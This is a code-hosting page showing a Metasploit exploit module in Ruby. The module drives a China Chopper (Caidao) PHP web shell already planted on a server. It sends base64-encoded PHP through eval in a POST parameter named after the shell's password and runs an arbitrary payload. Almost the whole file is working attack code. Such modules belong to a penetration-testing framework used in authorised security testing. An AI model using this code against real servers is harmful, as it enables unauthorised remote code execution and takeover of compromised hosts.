PageRenderTime 52ms CodeModel.GetById 25ms RepoModel.GetById 0ms app.codeStats 0ms

/modules/exploits/multi/http/caidao_php_backdoor_exec.rb

https://gitlab.com/0072016/metasploit-framework-rapid7
Ruby | 72 lines | 59 code | 9 blank | 4 comment | 2 complexity | f5a1313427fb89b88b3d76b8f4b3e727 MD5 | raw file
    

  1. 

  2. ##
    3. 

  3. # This module requires Metasploit: http://metasploit.com/download
    4. 

  4. # Current source: https://github.com/rapid7/metasploit-framework
    5. 

  5. ##
    6. 

  6. 

  7. require 'msf/core'
    8. 

  8. 

  9. class MetasploitModule < Msf::Exploit::Remote
    10. 

  10.   Rank = ExcellentRanking
    11. 

  11. 

  12.   include Msf::Exploit::Remote::HttpClient
    13. 

  13. 

  14.   def initialize(info = {})
    15. 

  15.     super(update_info(info,
    16. 

  16.       'Name'              => 'China Chopper Caidao PHP Backdoor Code Execution',
    17. 

  17.       'Description'       => %q{
    18. 

  18.         This module takes advantage of the China Chopper Webshell that is
    19. 

  19.         commonly used by Chinese hackers.
    20. 

  20.       },
    21. 

  21.       'License'           => MSF_LICENSE,
    22. 

  22.       'Author'            => ['Nixawk'],
    23. 

  23.       'References'        =>
    24. 

  24.         [
    25. 

  25.           ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
    26. 

  26.           ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'],
    27. 

  27.           ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
    28. 

  28.           ['URL', 'https://www.us-cert.gov/ncas/alerts/TA15-313A']
    29. 

  29.         ],
    30. 

  30.       'Platform'          => ['php'],
    31. 

  31.       'Arch'              => ARCH_PHP,
    32. 

  32.       'Targets'           =>
    33. 

  33.         [
    34. 

  34.           ['Automatic', {}]
    35. 

  35.         ],
    36. 

  36.       'Privileged'        => false,
    37. 

  37.       'DisclosureDate'    => 'Oct 27 2015',
    38. 

  38.       'DefaultTarget'     => 0))
    39. 

  39. 

  40.     register_options(
    41. 

  41.       [
    42. 

  42.         OptString.new('TARGETURI', [true, 'The path of backdoor', '/caidao.php']),
    43. 

  43.         OptString.new('PASSWORD', [true, 'The password of backdoor', 'chopper'])
    44. 

  44.       ], self.class)
    45. 

  45.   end
    46. 

  46. 

  47.   def http_send_command(code)
    48. 

  48.     code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"
    49. 

  49.     send_request_cgi({
    50. 

  50.       'method'    => 'POST',
    51. 

  51.       'uri'       => normalize_uri(target_uri.path),
    52. 

  52.       'vars_post' => {
    53. 

  53.         "#{datastore['PASSWORD']}" => code
    54. 

  54.       }
    55. 

  55.     })
    56. 

  56.   end
    57. 

  57. 

  58.   def check
    59. 

  59.     flag = Rex::Text.rand_text_alpha(16)
    60. 

  60.     res = http_send_command("printf(\"#{flag}\");")
    61. 

  61.     if res && res.body =~ /#{flag}/m
    62. 

  62.       Exploit::CheckCode::Vulnerable
    63. 

  63.     else
    64. 

  64.       Exploit::CheckCode::Safe
    65. 

  65.     end
    66. 

  66.   end
    67. 

  67. 

  68.   def exploit
    69. 

  69.     print_status("Sending exploit...")
    70. 

  70.     http_send_command(payload.raw)
    71. 

  71.   end
    72. 

  72. end
    73. 

  73.